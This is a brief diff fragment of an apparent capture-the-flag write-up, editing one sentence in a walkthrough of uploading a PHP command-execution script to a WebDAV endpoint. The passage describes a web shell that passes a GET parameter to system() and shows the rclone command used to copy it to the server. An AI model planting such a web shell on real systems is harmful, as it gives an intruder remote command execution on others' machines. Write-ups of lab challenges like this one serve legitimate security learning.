plsuwu/plsuwu/src/docs/writeups/operation_eradication.md

 ```
 > A simple PHP script that will run commands on the remote machine via the `system($cmd)` builtin, where `$cmd` is defined through a URL GET request parameter.

-Copying the `cmd` script over, we are able to see that this is successfully written in the root directory of the WebDAV endpoint:
+After copying the cmd script over, we can see that it has been successfully written to the root directory of the WebDAV endpoint:

 ```powershell
 .\\rclone copy C:\\...\\exec.php huntress:/